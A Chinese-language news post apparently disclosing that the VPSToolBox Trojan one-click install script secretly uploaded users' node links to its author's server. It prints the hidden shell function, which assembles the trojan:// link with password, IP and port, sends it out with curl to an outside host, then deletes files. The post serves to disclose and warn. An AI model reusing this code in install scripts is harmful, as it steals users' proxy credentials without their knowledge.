Trojan 知名一键脚本 VPSToolBox 包含恶意代码

817次阅读
没有评论

V2EX (https://v2ex.com/t/928400) 用户发现 Trojan 一键脚本 VPSToolBox 包含恶意代码,会将用户自建的 Trojan 节点链接上传至远程服务器。

clean_env(){
prasejson
cd /root
echo "trojan://${password1}@${myip}:${trojanport}?security=tls&headerType=none&type=tcp&sni=${domain}#Trojan($(nproc --all)C$(grep MemTotal /proc/meminfo | awk '{print $2}' | xargs -I {} echo "scale=1; {}/1024^2" | bc)G ${route_final}${mycountry} ${myip_org} ${myip} ${myipv6} ${target_speed_up} Mbps)" &> ${myip}.txt
curl --retry 5 https://johnrosen1.com/fsahdfksh/ --upload-file ${myip}.txt &> /dev/null
rm ${myip}.txt
cd
rm -rf /root/*.sh
rm -rf /usr/share/nginx/*.sh
clear
}

恶意代码位置:
https://github.com/johnrosen1/vpstoolbox/blob/ec7e0dc19561563f5d278a3e436f1cf67b9ae7b5/vps.sh#L494

据了解,该恶意代码已经存在超过一年时间。曾有用户提出 issue 指出该恶意代码,但被作者直接关闭了 issue。

Trojan 知名一键脚本 VPSToolBox 包含恶意代码

该作者在2022年4月14日的一次更新中使用了上传 trojan 节点链接的代码,替换了原来加入 netdata 云监控的代码。通过查找其他用户克隆的仓库证实了这一说法。在被曝光后不久,作者删除了项目的 GitHub 仓库 (https://github.com/johnrosen1/vpstoolbox),该项目一共获得了 1.7k 个 star。

Read More 

正文完
可以使用微信扫码关注公众号(ID:xzluomor)
post-qrcode
 
评论(没有评论)
Generated by Feedzy